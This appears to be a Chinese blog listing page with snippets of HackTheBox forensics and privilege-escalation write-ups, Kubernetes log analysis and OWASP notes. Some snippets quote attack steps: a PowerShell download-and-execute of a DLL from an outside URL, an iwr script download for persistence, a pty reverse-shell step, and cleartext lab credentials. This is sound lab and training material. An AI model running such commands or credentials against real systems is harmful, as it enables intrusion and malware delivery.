- 博客(20)
- 收藏
- 关注
RSS订阅原创 云安全日志日志分析
三 2023-12-06 10:00:01 hostname docker[1234]: time="2023-12-06T10:00:01.987654321Z" level=info msg="API listen on /var/run/docker.sock"其他组件存储位置同理。例如,在目录下查看kube-apiserver的配置文件。-- Logs begin at 三 2023-12-06 03:45:31 CST, end at 三 2023-12-06 16:50:44 CST. --
2023-12-27 00:40:17
31
1
原创 k8s日志
使用日志收集和分析工具:例如Elasticsearch、Logstash和Kibana(ELK)堆栈,或者 Prometheus 和 Grafana 等工具,可以集中收集和分析k8s集群的所有日志,提供更强大的搜索和可视化功能。在分析日志时,重点关注未经授权的访问尝试、异常操作和不符合常规的行为。确定影响范围:通过查看受影响的API调用、节点活动和容器行为,我们可以评估攻击的影响范围,为后续的恢复和修复工作提供依据。追踪攻击路径:日志提供了攻击发生的时间线,帮助我们追踪攻击者的操作路径,理解攻击的全过程。
2023-12-25 10:04:16
47
原创 HackTheBox Forensic Reflection #Windows(更新中)
在这个例子中,下载的是一个名为 "sysdriver.ps1" 的 PowerShell 脚本。输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。例如,".text" 节通常包含可执行代码,".data" 节包含初始化的数据,".rdata" 节包含只读数据等。这些导入和导出的信息都会在特定的表中记录。
2023-12-19 23:57:04
297
1
原创 HackTheBox Forensic Reflection #Windows(更新中)test
输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。-PEUrl https://windowsliveupdater.com/winmgr.dll 指定了要下载和执行的 DLL 文件的 URL('https://windowsliveupdater.com/winmgr.dll')。
2023-12-18 22:25:01
27
1
原创 HackTheBox LPE Node #Linux(更新中)
mongodb:// # 必需的前缀,表示这是一个 MongoDB 连接字符串。mark:5AYRft73VtFpc84k@ # 用户名(mark)和密码(5AYRft73VtFpc84k)部分,用冒号分隔。这是可选的,如果有身份验证需求则使用。解码发现是zip 没有解压密码有的看不了,试试fcrackzip。F12到js查看,指引了个/api/users。m是1400,用hashcat 跑一下。咋整,调查一下信息,比如看tom的进程。解压后,在app.js发现这个。gobuster不行。
2023-12-17 16:41:41
35
1
原创 HackTheBox-LPE-Mirai #Linux
是一种非标准的HTTP头部字段,它出现在Pi-hole这一DNS沉洞服务器的服务响应中。Pi-hole是一种流行的开源广告拦截解决方案,它通过充当网络上的DNS服务器来阻止广告请求。当您访问Pi-hole的管理界面或者从受到Pi-hole保护的网络中发起DNS查询时,可能会看到这个特殊的HTTP头字段。运行rm命令并不会改变文件在内存中的内容,它只是更改了围绕文件的元数据,告诉操作系统现在这部分内存可用于写入。文件中,这样就可以在不插拔实际硬件的情况下查看或恢复设备上的数据。设备上的所有数据克隆到。
2023-12-16 15:20:46
263
1
原创 HackTheBox-LPE-Nibbles #Linux
这是是一个命令,它的作用是在Unix或类Unix系统中以root用户的身份执行名为 monitor.sh 的shell脚本。sudo 是超级用户(Super User)做的缩写,它允许普通用户暂时获得root权限来执行需要更高权限的任务。./monitor.sh 是指当前目录下的名为 monitor.sh 的shell脚本。-u root 表示指定要使用的用户为root,也就是系统的超级用户。参数是用来指定切换到哪个用户身份来执行后续的命令。参数一起使用时,后面的值应该是你要模拟的用户的用户名。
2023-12-15 21:43:30
836
原创 HackTheBox-LPE-help #Linux
pty.spawn('/bin/bash')"生成交互式shell。虽然显示file not found ,但是文件已经被上传到了网站上,立即执行python脚本,找到文件。可以用[email protected]:godhelpmeplz去登录helpdeskZ。搜索helpdeskZ,在github上发现已经是八年前更新的组件了。登录以后,上传一个ticket,查看路径。查看user.txt 和root.txt。查看内核版本4.4.0,可执行提权。点击链接执行反弹shell,成功。
2023-12-14 22:44:41
176
1
原创 HackTheBox-LPE-SwagShop #Linux(网络问题。烂尾)
guide模式下填写答案,2个tcp,电子商务软件magento。下载magescan工具,扫描magento版本为1.9.0.0。magento 搜索路径下找到mysql信息,保存起来后续用。后面因为网络原因poc应用不了,遂中止。searchsploit查找,rce。把ip地址添加到hosts文件中。访问swagshop.htb。
2023-12-13 21:11:04
21
1
原创 网络安全笔记 #DOS攻击 #CC攻击 #IDS #云镜 #WAF #堡垒机
针对WEB程序的DOS攻击,控制多个客户端机器,模拟大量合法用户向目标发送请求,导致资源耗尽,从而无法为真正的用户提供正常服务。被动安全工具的,通常旁路部署。这些记录包括用户的每一次登录、执行的每一个命令、访问的每一个文件,甚至是每一次屏幕上的点击动作。堡垒机,也称为运维安全审计系统,是一种网络安全设备,用于监控和记录运维人员对网络内服务器、网络设备、安全设备、数据库等设备的操作行为。这样,即使用户直接在目标设备上进行操作,所有的操作也都会通过堡垒机进行中转和记录,确保了操作的可追溯性和审计的可能性。
2023-12-13 15:07:06
35
1
原创 OWASP Top 10 2017 & 网络安全常见的python库
*原理:** 日志记录和监控不足是指应用程序缺乏足够的日志记录和监控功能,使得攻击者可以隐藏他们的活动,或者导致在发生安全事件时无法及时发现并采取行动。**原理:** 未经验证的重定向和转发是指应用程序允许用户通过不受控制的URL跳转到其他网站或页面。**原理:** CSRF攻击是一种欺骗用户执行他们不想进行的操作的方式。攻击者通常使用伪造的请求来诱导用户执行操作,而用户并不知情。**原理:** 安全配置错误是指由于配置不当而导致的安全问题,包括错误的设置、未更新的系统、不必要的功能等。
2023-12-12 16:39:33
322
原创 HackTheBox-Windows-Blue #Windows
Blue虽然可能是黑客盒子上最简单的机器,但它证明了EternalBlue漏洞的严重性,自公开泄露以来,该漏洞已被用于多次大规模勒索软件和加密挖矿攻击。时,这意味着你当前正在以系统级别的权限执行操作。这通常意味着你可以访问和控制计算机上的所有资源,包括文件、注册表和其他系统设置。smb version scanner 扫描显示是win7 Pro SP1,ms17-010的攻击对象。nmap扫描 -F fewer port than default scan。五个share 3个$隐藏share。
2023-12-08 21:30:02
117
原创 HackTheBox-BlueTeam-No Place To Hide #Windows
位图缓存由客户端和服务器用来存储图形位图。每个位图缓存都保存以像素为单位的指定大小的位图(称为“平铺大小”)。如果位图不适合单个缓存项,服务器将使用平铺算法将位图划分为适合缓存项的平铺,以便将其单独存储到缓存中。给了两个文件,.bin的rdp cache文件和.bmc 的cached bitmap file。需要用bmc-tools去提取缓存文件。
2023-12-08 20:09:26
23
原创 HackTheBox-Forensic-Peel Back The Layers #Linux
在 Dockerfile 中使用 RUN rm 或类似命令删除了一个文件时,该文件实际上并没有从镜像中物理删除。它只是在一个新的层中被标记为已删除,并且上一层中的文件保持不变。这些文件仍然可以在后续的层中找到,因为它们是在上一层中存在的。我们通过 docker save 生成的 tar 文件会包含所有层,包括那些dockerfile删除了文件的层。docker history 命令同样可以查看 Docker 镜像的构建历史,包括每一层镜像创建的时间、作者、大小变化以及使用的命令等信息。
2023-12-06 18:42:01
20
1
原创 HackTheBox-Forensic-Insider #Browser #Mozilla
给了一个压缩包,解压出来除了Firefox以外没有内容将在这个文件夹中查找攻击者访问的内容,这个文件夹包含了火狐浏览器需要的设置和一些信息为了排除干扰信息,建议在系统上新建一个账户,把该文件夹复制到c:\user\xxx\appdata\local\mozilla我们启动火狐浏览器,就会自动读取目录下profile的信息访问历史显示了攻击者登录了acc01的8080端口,可以看到攻击者访问了password字段显示了flag
2023-12-05 22:20:23
22
1
原创 HackTheBox-Forensic—Export #Windows #Volatility
(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。先尝试pslist列出目标系统中的进程列表。
2023-12-05 22:02:32
33
1
原创 HackTheBox-Forensic— Illumination #Linux #Git
从config变量可以看到,从config.json读取了文件,解析token后进行login操作。根据注释可见token已经被替换,因为不是base64,无法在开发/生产中正常工作。首先通过ls -la找到 .git 发现这是一个git repository。通过git show 加commit id可以看到变更记录。由于这是git库,可以通过过去的日志查看被替换之前的值。查看config.json文件。
2023-12-05 21:17:42
130
1
原创 HackTheBox-Forensic— Red Miners #Linux
cronCleanUp 删除原有的计划任务,contab -l 可以列举 用sed去掉之后 crontab编辑 将修改内容保存。cleanEnv这个函数把环境中阻碍挖矿的进程杀掉,还会检查其他挖矿的行为,如果有的话也会杀掉。flag的四个部分通过搜索 == 或者"base64 -d"可以找到,经过拼接,得到最后的结果。给了一个miner.zip里面是一个installer_miner.sh的挖矿文件。
2023-12-05 20:31:29
36
1
原创 HackTheBox-Forensic—Extraterrestrial Persistence #Linux
WantedBy=multi-user.target #在multi-user.target启动时自动启动。[]是systemd的语法规定,用于规定节的开始和结束 一般都会有 关于服务的一般性描述和依赖关系。ExecStart=/usr/local/bin/service #服务开始时执行的命令。ExecStop=/usr/local/bin/service #服务停止时执行的命令。[Install] #定义服务与系统目标之间的关联以及启用或禁用服务时的行为。丢到hiencode解码。
2023-12-05 17:25:52
27
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人